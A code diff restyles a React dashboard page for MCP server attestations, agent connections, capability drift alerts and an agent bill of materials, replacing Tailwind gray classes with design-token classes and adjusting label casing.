-                <Search className="absolute left-3 top-1/2 -translate-y-1/2 h-4 w-4 text-gray-400" />
+                <Search className="absolute left-3 top-1/2 -translate-y-1/2 h-4 w-4 text-ink-tertiary" />
                 <input
                   type="text"
                   placeholder="Search servers..."
@@ -1159,7 +1164,7 @@ function SupplyChainPage() {
                     setMcpSearchFilter(e.target.value);
                     setMcpPage(1);
                   }}
-                  className="pl-9 pr-3 py-2 text-sm border border-gray-300 dark:border-gray-600 rounded-md bg-white dark:bg-gray-700 text-gray-900 dark:text-white placeholder-gray-400 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent w-full sm:w-48"
+                  className="pl-9 pr-3 py-2 text-sm border border-stroke rounded-inset-sm bg-glass-inset text-ink placeholder:text-ink-tertiary focus:outline-none focus:ring-2 focus:ring-brand focus:border-transparent w-full sm:w-48"
                 />
               </div>
               <select
@@ -1168,9 +1173,9 @@ function SupplyChainPage() {
                   setMcpStatusFilter(e.target.value);
                   setMcpPage(1);
                 }}
-                className="px-3 py-2 text-sm border border-gray-300 dark:border-gray-600 rounded-md bg-white dark:bg-gray-700 text-gray-900 dark:text-white focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent"
+                className="px-3 py-2 text-sm border border-stroke rounded-inset-sm bg-glass-inset text-ink focus:outline-none focus:ring-2 focus:ring-brand focus:border-transparent"
               >
-                <option value="all">All Status</option>
+                <option value="all">All statuses</option>
                 <option value="verified">Verified</option>
                 <option value="pending">Pending</option>
                 <option value="active">Active</option>
@@ -1180,35 +1185,35 @@ function SupplyChainPage() {
           </div>
         </div>
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-900">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Server
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Status
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Attestations
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Capabilities
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                  Last Attested
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                  Last attested
                 </th>
-                <th className="px-6 py-3 text-right text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-right text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Actions
                 </th>
               </tr>
             </thead>
-            <tbody className="bg-white dark:bg-gray-800 divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {paginatedMcpServers.length === 0 ? (
                 <tr>
                   <td
                     colSpan={6}
-                    className="px-6 py-12 text-center text-gray-500 dark:text-gray-400"
+                    className="px-6 py-12 text-center text-ink-secondary"
                   >
                     <Server className="h-12 w-12 mx-auto mb-4 opacity-50" />
                     <p className="text-lg font-medium">
@@ -1227,16 +1232,16 @@ function SupplyChainPage() {
                 paginatedMcpServers.map((server) => (
                   <tr
                     key={server.id}
-                    className="hover:bg-gray-50 dark:hover:bg-gray-700/50"
+                    className="hover:bg-glass-inset-gray"
                   >
                     <td className="px-6 py-4 whitespace-nowrap">
                       <div className="flex items-center">
-                        <Server className="h-5 w-5 text-gray-400 mr-3" />
+                        <Server className="h-5 w-5 text-ink-tertiary mr-3" />
                         <div>
-                          <div className="text-sm font-medium text-gray-900 dark:text-white">
+                          <div className="text-sm font-medium text-ink">
                             {server.name}
                           </div>
-                          <div className="text-sm text-gray-500 dark:text-gray-400 truncate max-w-xs">
+                          <div className="text-sm text-ink-secondary truncate max-w-xs">
                             {server.url}
                           </div>
                         </div>
@@ -1245,13 +1250,13 @@ function SupplyChainPage() {
                     <td className="px-6 py-4 whitespace-nowrap">
                       <StatusBadge status={server.status} />
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-900 dark:text-white">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink">
                       {server.attestationCount || 0}
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500 dark:text-gray-400">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink-secondary">
                       {server.toolCount || 0} tools
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500 dark:text-gray-400">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink-secondary">
                       {server.lastAttestedAt || server.lastVerifiedAt
                         ? formatDateTime(server.lastAttestedAt || server.lastVerifiedAt || "")
                         : "Never"}
@@ -1261,7 +1266,7 @@ function SupplyChainPage() {
                         onClick={() =>
                           router.push(`/dashboard/mcp/${server.id}`)
                         }
-                        className="text-blue-600 dark:text-blue-400 hover:text-blue-900 dark:hover:text-blue-300"
+                        className="text-brand-text hover:text-brand"
                       >
                         <Eye className="h-4 w-4" />
                       </button>
@@ -1274,8 +1279,8 @@ function SupplyChainPage() {
         </div>
         {/* MCP Servers Pagination */}
         {filteredMcpServers.length > 0 && (
-          <div className="px-6 py-4 border-t border-gray-200 dark:border-gray-700 flex flex-col sm:flex-row items-center justify-between gap-4">
-            <div className="flex items-center gap-2 text-sm text-gray-500 dark:text-gray-400">
+          <div className="px-6 py-4 border-t border-divider flex flex-col sm:flex-row items-center justify-between gap-4">
+            <div className="flex items-center gap-2 text-sm text-ink-secondary">
               <span>Show</span>
               <select
                 value={mcpPageSize}
@@ -1283,7 +1288,7 @@ function SupplyChainPage() {
                   setMcpPageSize(Number(e.target.value));
                   setMcpPage(1);
                 }}
-                className="px-2 py-1 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-900 dark:text-white text-sm"
+                className="px-2 py-1 border border-stroke rounded-inset-sm bg-glass-inset text-ink text-sm"
               >
                 <option value={5}>5</option>
                 <option value={10}>10</option>
@@ -1296,17 +1301,17 @@ function SupplyChainPage() {
               <button
                 onClick={() => setMcpPage((p) => Math.max(1, p - 1))}
                 disabled={mcpPage === 1}
-                className="p-2 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-700 dark:text-gray-200 hover:bg-gray-50 dark:hover:bg-gray-600 disabled:opacity-50 disabled:cursor-not-allowed"
+                className="p-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink-body hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
               >
                 <ChevronLeft className="h-4 w-4" />
               </button>
-              <span className="text-sm text-gray-700 dark:text-gray-300">
+              <span className="text-sm text-ink-body">
                 Page {mcpPage} of {totalMcpPages || 1}
               </span>
               <button
                 onClick={() => setMcpPage((p) => Math.min(totalMcpPages, p + 1))}
                 disabled={mcpPage >= totalMcpPages}
-                className="p-2 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-700 dark:text-gray-200 hover:bg-gray-50 dark:hover:bg-gray-600 disabled:opacity-50 disabled:cursor-not-allowed"
+                className="p-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink-body hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
               >
                 <ChevronRight className="h-4 w-4" />
               </button>
@@ -1316,24 +1321,24 @@ function SupplyChainPage() {
       </div>
 
       {/* Agent Connections Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
-        <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
+      <div className="glass overflow-hidden">
+        <div className="px-6 py-4 border-b border-divider">
           <div className="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-4">
             <div>
-              <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2">
-                <Link2 className="h-5 w-5 text-cyan-500" />
-                Agent-MCP Connections
-                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+              <h3 className="text-lg font-semibold text-ink flex items-center gap-2">
+                <Link2 className="h-5 w-5 text-brand-sky" />
+                Agent-MCP connections
+                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {filteredConnections.length}
                 </span>
               </h3>
-              <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-sm text-ink-secondary">
                 Active connections between agents and MCP servers
               </p>
             </div>
             <div className="flex flex-col sm:flex-row gap-2">
               <div className="relative">
-                <Search className="absolute left-3 top-1/2 -translate-y-1/2 h-4 w-4 text-gray-400" />
+                <Search className="absolute left-3 top-1/2 -translate-y-1/2 h-4 w-4 text-ink-tertiary" />
                 <input
                   type="text"
                   placeholder="Search agents or servers..."
@@ -1342,7 +1347,7 @@ function SupplyChainPage() {
                     setConnSearchFilter(e.target.value);
                     setConnPage(1);
                   }}
-                  className="pl-9 pr-3 py-2 text-sm border border-gray-300 dark:border-gray-600 rounded-md bg-white dark:bg-gray-700 text-gray-900 dark:text-white placeholder-gray-400 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent w-full sm:w-56"
+                  className="pl-9 pr-3 py-2 text-sm border border-stroke rounded-inset-sm bg-glass-inset text-ink placeholder:text-ink-tertiary focus:outline-none focus:ring-2 focus:ring-brand focus:border-transparent w-full sm:w-56"
                 />
               </div>
               <select
@@ -1351,9 +1356,9 @@ function SupplyChainPage() {
                   setConnStatusFilter(e.target.value);
                   setConnPage(1);
                 }}
-                className="px-3 py-2 text-sm border border-gray-300 dark:border-gray-600 rounded-md bg-white dark:bg-gray-700 text-gray-900 dark:text-white focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent"
+                className="px-3 py-2 text-sm border border-stroke rounded-inset-sm bg-glass-inset text-ink focus:outline-none focus:ring-2 focus:ring-brand focus:border-transparent"
               >
-                <option value="all">All Status</option>
+                <option value="all">All statuses</option>
                 <option value="active">Active</option>
                 <option value="inactive">Inactive</option>
               </select>
@@ -1361,38 +1366,38 @@ function SupplyChainPage() {
           </div>
         </div>
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-900">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Agent
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                  MCP Server
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                  MCP server
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                  Connection Type
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                  Connection type
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Attestations
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                  First Connected
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                  First connected
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                  Last Attested
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                  Last attested
                 </th>
-                <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                   Status
                 </th>
               </tr>
             </thead>
-            <tbody className="bg-white dark:bg-gray-800 divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {paginatedConnections.length === 0 ? (
                 <tr>
                   <td
                     colSpan={7}
-                    className="px-6 py-12 text-center text-gray-500 dark:text-gray-400"
+                    className="px-6 py-12 text-center text-ink-secondary"
                   >
                     <Link2 className="h-12 w-12 mx-auto mb-4 opacity-50" />
                     <p className="text-lg font-medium">
@@ -1411,48 +1416,48 @@ function SupplyChainPage() {
                 paginatedConnections.map((conn) => (
                   <tr
                     key={conn.id}
-                    className="hover:bg-gray-50 dark:hover:bg-gray-700/50"
+                    className="hover:bg-glass-inset-gray"
                   >
                     <td className="px-6 py-4 whitespace-nowrap">
-                      <div className="text-sm font-medium text-gray-900 dark:text-white">
+                      <div className="text-sm font-medium text-ink">
                         {conn.agentName || conn.agentId.slice(0, 8)}
                       </div>
                     </td>
                     <td className="px-6 py-4 whitespace-nowrap">
-                      <div className="text-sm text-gray-900 dark:text-white">
+                      <div className="text-sm text-ink">
                         {conn.mcpServerName || conn.mcpServerId.slice(0, 8)}
                       </div>
                     </td>
                     <td className="px-6 py-4 whitespace-nowrap">
                       <span
-                        className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium ${
+                        className={`inline-flex items-center px-2.5 py-0.5 rounded-pill text-xs font-medium ${
                           conn.connectionType === "attested"
-                            ? "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300"
-                            : "bg-gray-100 dark:bg-gray-900/30 text-gray-800 dark:text-gray-300"
+                            ? "bg-success-fill text-success-text"
+                            : "bg-glass-inset-gray text-ink-body"
                         }`}
                       >
                         {conn.connectionType}
                       </span>
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-900 dark:text-white">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink">
                       {conn.attestationCount}
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500 dark:text-gray-400">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink-secondary">
                       {formatDateTime(conn.firstConnectedAt)}
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500 dark:text-gray-400">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink-secondary">
                       {conn.lastAttestedAt
                         ? formatDateTime(conn.lastAttestedAt)
                         : "Never"}
                     </td>
                     <td className="px-6 py-4 whitespace-nowrap">
                       {conn.isActive ? (
-                        <span className="inline-flex items-center text-green-600 dark:text-green-400">
+                        <span className="inline-flex items-center text-success-text">
                           <CheckCircle2 className="h-4 w-4 mr-1" />
                           Active
                         </span>
                       ) : (
-                        <span className="inline-flex items-center text-gray-500 dark:text-gray-400">
+                        <span className="inline-flex items-center text-ink-secondary">
                           <XCircle className="h-4 w-4 mr-1" />
                           Inactive
                         </span>
@@ -1466,8 +1471,8 @@ function SupplyChainPage() {
         </div>
         {/* Connections Pagination */}
         {filteredConnections.length > 0 && (
-          <div className="px-6 py-4 border-t border-gray-200 dark:border-gray-700 flex flex-col sm:flex-row items-center justify-between gap-4">
-            <div className="flex items-center gap-2 text-sm text-gray-500 dark:text-gray-400">
+          <div className="px-6 py-4 border-t border-divider flex flex-col sm:flex-row items-center justify-between gap-4">
+            <div className="flex items-center gap-2 text-sm text-ink-secondary">
               <span>Show</span>
               <select
                 value={connPageSize}
@@ -1475,7 +1480,7 @@ function SupplyChainPage() {
                   setConnPageSize(Number(e.target.value));
                   setConnPage(1);
                 }}
-                className="px-2 py-1 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-900 dark:text-white text-sm"
+                className="px-2 py-1 border border-stroke rounded-inset-sm bg-glass-inset text-ink text-sm"
               >
                 <option value={5}>5</option>
                 <option value={10}>10</option>
@@ -1488,17 +1493,17 @@ function SupplyChainPage() {
               <button
                 onClick={() => setConnPage((p) => Math.max(1, p - 1))}
                 disabled={connPage === 1}
-                className="p-2 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-700 dark:text-gray-200 hover:bg-gray-50 dark:hover:bg-gray-600 disabled:opacity-50 disabled:cursor-not-allowed"
+                className="p-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink-body hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
               >
                 <ChevronLeft className="h-4 w-4" />
               </button>
-              <span className="text-sm text-gray-700 dark:text-gray-300">
+              <span className="text-sm text-ink-body">
                 Page {connPage} of {totalConnPages || 1}
               </span>
               <button
                 onClick={() => setConnPage((p) => Math.min(totalConnPages, p + 1))}
                 disabled={connPage >= totalConnPages}
-                className="p-2 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-700 dark:text-gray-200 hover:bg-gray-50 dark:hover:bg-gray-600 disabled:opacity-50 disabled:cursor-not-allowed"
+                className="p-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink-body hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
               >
                 <ChevronRight className="h-4 w-4" />
               </button>
@@ -1509,57 +1514,57 @@ function SupplyChainPage() {
 
       {/* Capability Drift Alerts */}
       {driftAlerts.length > 0 && (
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden mt-8">
-          <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
-            <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2">
-              <AlertTriangle className="h-5 w-5 text-amber-500" />
-              Capability Drift Alerts
-              <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-amber-100 dark:bg-amber-900/30 text-amber-800 dark:text-amber-300 rounded-full">
+        <div className="glass overflow-hidden mt-8">
+          <div className="px-6 py-4 border-b border-divider">
+            <h3 className="text-lg font-semibold text-ink flex items-center gap-2">
+              <AlertTriangle className="h-5 w-5 text-warning-text" />
+              Capability drift alerts
+              <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-warning-fill text-warning-text rounded-pill">
                 {driftAlertCount}
               </span>
             </h3>
-            <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+            <p className="mt-1 text-sm text-ink-secondary">
               Detected changes in MCP server capabilities that may require attention
             </p>
           </div>
           <div className="overflow-x-auto">
-            <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-              <thead className="bg-gray-50 dark:bg-gray-900">
+            <table className="min-w-full divide-y divide-divider">
+              <thead className="bg-glass-inset-gray">
                 <tr>
-                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                  <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                     Severity
                   </th>
-                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                    MCP Server
+                  <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                    MCP server
                   </th>
-                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                  <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                     Capability
                   </th>
-                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
-                    Change Type
+                  <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
+                    Change type
                   </th>
-                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                  <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                     Description
                   </th>
-                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
+                  <th className="px-6 py-3 text-left text-xs font-medium text-ink-secondary uppercase tracking-wider">
                     Detected
                   </th>
                 </tr>
               </thead>
-              <tbody className="bg-white dark:bg-gray-800 divide-y divide-gray-200 dark:divide-gray-700">
+              <tbody className="divide-y divide-divider">
                 {paginatedDriftAlerts.map((alert) => (
                   <tr
                     key={alert.id}
-                    className="hover:bg-gray-50 dark:hover:bg-gray-700/50"
+                    className="hover:bg-glass-inset-gray"
                   >
                     <td className="px-6 py-4 whitespace-nowrap">
                       <span
-                        className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium ${
+                        className={`inline-flex items-center px-2.5 py-0.5 rounded-pill text-xs font-medium ${
                           alert.severity === "high"
-                            ? "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300"
+                            ? "bg-danger-fill text-danger-text"
                             : alert.severity === "medium"
-                            ? "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300"
-                            : "bg-blue-100 dark:bg-blue-900/30 text-blue-800 dark:text-blue-300"
+                            ? "bg-warning-fill text-warning-text"
+                            : "bg-brand-soft text-brand-text"
                         }`}
                       >
                         {alert.severity === "high" && (
@@ -1569,26 +1574,26 @@ function SupplyChainPage() {
                       </span>
                     </td>
                     <td className="px-6 py-4 whitespace-nowrap">
-                      <div className="text-sm font-medium text-gray-900 dark:text-white">
+                      <div className="text-sm font-medium text-ink">
                         {alert.mcpServerName}
                       </div>
                     </td>
                     <td className="px-6 py-4 whitespace-nowrap">
-                      <div className="text-sm text-gray-900 dark:text-white">
+                      <div className="text-sm text-ink">
                         {alert.capabilityName}
                       </div>
-                      <div className="text-xs text-gray-500 dark:text-gray-400">
+                      <div className="text-xs text-ink-secondary">
                         {alert.capabilityType}
                       </div>
                     </td>
                     <td className="px-6 py-4 whitespace-nowrap">
                       <span
-                        className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium ${
+                        className={`inline-flex items-center px-2.5 py-0.5 rounded-pill text-xs font-medium ${
                           alert.driftType === "added"
-                            ? "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300"
+                            ? "bg-success-fill text-success-text"
                             : alert.driftType === "removed"
-                            ? "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300"
-                            : "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300"
+                            ? "bg-danger-fill text-danger-text"
+                            : "bg-warning-fill text-warning-text"
                         }`}
                       >
                         {alert.driftType}
@@ -1596,13 +1601,13 @@ function SupplyChainPage() {
                     </td>
                     <td className="px-6 py-4">
                       <div
-                        className="text-sm text-gray-500 dark:text-gray-400 max-w-md truncate"
+                        className="text-sm text-ink-secondary max-w-md truncate"
                         title={alert.description}
                       >
                         {alert.description}
                       </div>
                     </td>
-                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500 dark:text-gray-400">
+                    <td className="px-6 py-4 whitespace-nowrap text-sm text-ink-secondary">
                       {formatDateTime(alert.detectedAt)}
                     </td>
                   </tr>
@@ -1612,8 +1617,8 @@ function SupplyChainPage() {
           </div>
           {/* Drift Alerts Pagination */}
           {driftAlerts.length > 0 && (
-            <div className="px-6 py-4 border-t border-gray-200 dark:border-gray-700 flex flex-col sm:flex-row items-center justify-between gap-4">
-              <div className="flex items-center gap-2 text-sm text-gray-500 dark:text-gray-400">
+            <div className="px-6 py-4 border-t border-divider flex flex-col sm:flex-row items-center justify-between gap-4">
+              <div className="flex items-center gap-2 text-sm text-ink-secondary">
                 <span>Show</span>
                 <select
                   value={driftPageSize}
@@ -1621,7 +1626,7 @@ function SupplyChainPage() {
                     setDriftPageSize(Number(e.target.value));
                     setDriftPage(1);
                   }}
-                  className="px-2 py-1 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-900 dark:text-white text-sm"
+                  className="px-2 py-1 border border-stroke rounded-inset-sm bg-glass-inset text-ink text-sm"
                 >
                   <option value={5}>5</option>
                   <option value={10}>10</option>
@@ -1634,17 +1639,17 @@ function SupplyChainPage() {
                 <button
                   onClick={() => setDriftPage((p) => Math.max(1, p - 1))}
                   disabled={driftPage === 1}
-                  className="p-2 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-700 dark:text-gray-200 hover:bg-gray-50 dark:hover:bg-gray-600 disabled:opacity-50 disabled:cursor-not-allowed"
+                  className="p-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink-body hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
                 >
                   <ChevronLeft className="h-4 w-4" />
                 </button>
-                <span className="text-sm text-gray-700 dark:text-gray-300">
+                <span className="text-sm text-ink-body">
                   Page {driftPage} of {totalDriftPages || 1}
                 </span>
                 <button
                   onClick={() => setDriftPage((p) => Math.min(totalDriftPages, p + 1))}
                   disabled={driftPage >= totalDriftPages}
-                  className="p-2 border border-gray-300 dark:border-gray-600 rounded bg-white dark:bg-gray-700 text-gray-700 dark:text-gray-200 hover:bg-gray-50 dark:hover:bg-gray-600 disabled:opacity-50 disabled:cursor-not-allowed"
+                  className="p-2 border border-stroke rounded-inset-sm bg-glass-inset text-ink-body hover:bg-glass-inset-gray disabled:opacity-50 disabled:cursor-not-allowed"
                 >
                   <ChevronRight className="h-4 w-4" />
                 </button>
@@ -1660,126 +1665,126 @@ function SupplyChainPage() {
       {activeTab === "abom" && (
         <div className="space-y-6">
           {/* ABOM Header Banner - Muted style matching Supply Chain */}
-          <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-6">
+          <div className="glass p-6">
             <div className="flex items-center justify-between">
               <div className="flex items-center gap-4">
-                <Package className="h-8 w-8 text-gray-400" />
+                <Package className="h-8 w-8 text-ink-tertiary" />
                 <div>
-                  <h2 className="text-xl font-semibold text-gray-900 dark:text-white">Agent Bill of Materials</h2>
-                  <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
+                  <h2 className="text-xl font-semibold text-ink">Agent Bill of Materials</h2>
+                  <p className="text-sm text-ink-secondary mt-1">
                     Complete inventory of all agents, MCP servers, tools, and data access patterns observed by AIM
                   </p>
                 </div>
               </div>
               <div className="text-right">
-                <p className="text-xs text-gray-500 dark:text-gray-400">Generated</p>
-                <p className="text-sm font-medium text-gray-900 dark:text-white">{new Date(abomData.generatedAt).toLocaleString()}</p>
-                <p className="text-xs text-gray-500 dark:text-gray-400 mt-1">Version {abomData.version}</p>
+                <p className="text-xs text-ink-secondary">Generated</p>
+                <p className="text-sm font-medium text-ink">{new Date(abomData.generatedAt).toLocaleString()}</p>
+                <p className="text-xs text-ink-secondary mt-1">Version {abomData.version}</p>
               </div>
             </div>
           </div>
 
           {/* ABOM Summary Stats */}
           <div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-6 gap-4">
-            <div className="bg-white dark:bg-gray-800 p-4 rounded-lg border border-gray-200 dark:border-gray-700">
+            <div className="glass p-4">
               <div className="flex items-center gap-3">
-                <div className="p-2 bg-blue-100 dark:bg-blue-900/30 rounded-lg">
-                  <Bot className="h-5 w-5 text-blue-600 dark:text-blue-400" />
+                <div className="p-2 bg-brand-soft rounded-lg">
+                  <Bot className="h-5 w-5 text-brand-text" />
                 </div>
                 <div>
-                  <p className="text-2xl font-bold text-blue-600 dark:text-blue-400">{abomData.summary.totalAgents}</p>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">Agents</p>
+                  <p className="text-2xl font-bold text-brand-text">{abomData.summary.totalAgents}</p>
+                  <p className="text-xs text-ink-secondary">Agents</p>
                 </div>
               </div>
             </div>
-            <div className="bg-white dark:bg-gray-800 p-4 rounded-lg border border-gray-200 dark:border-gray-700">
+            <div className="glass p-4">
               <div className="flex items-center gap-3">
-                <div className="p-2 bg-purple-100 dark:bg-purple-900/30 rounded-lg">
-                  <Server className="h-5 w-5 text-purple-600 dark:text-purple-400" />
+                <div className="p-2 bg-brand-soft rounded-lg">
+                  <Server className="h-5 w-5 text-brand-indigo" />
                 </div>
                 <div>
-                  <p className="text-2xl font-bold text-purple-600 dark:text-purple-400">{abomData.summary.totalMcpServers}</p>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">MCP Servers</p>
+                  <p className="text-2xl font-bold text-brand-indigo">{abomData.summary.totalMcpServers}</p>
+                  <p className="text-xs text-ink-secondary">MCP servers</p>
                 </div>
               </div>
             </div>
-            <div className="bg-white dark:bg-gray-800 p-4 rounded-lg border border-gray-200 dark:border-gray-700">
+            <div className="glass p-4">
               <div className="flex items-center gap-3">
-                <div className="p-2 bg-green-100 dark:bg-green-900/30 rounded-lg">
-                  <Wrench className="h-5 w-5 text-green-600 dark:text-green-400" />
+                <div className="p-2 bg-success-fill rounded-lg">
+                  <Wrench className="h-5 w-5 text-success-text" />
                 </div>
                 <div>
-                  <p className="text-2xl font-bold text-green-600 dark:text-green-400">{abomData.summary.totalTools}</p>
-                  <p className="text-xs text-gray-500 dark:text-gray-400">Tools</p>
+                  <p className="text-2xl font-bold text-success-text">{abomData.summary.totalTools}</p>
+                  <p className="text-xs text-ink-secondary">Tools</p>
                 </div>
               </div>
             </div>
-            <div className="bg-white dark:bg-gray-800 p-4 rounded-lg border border-gray-200 dark:border-gray-700">
+            <div className="glass p-4">
               <div className="flex items-center gap-3">
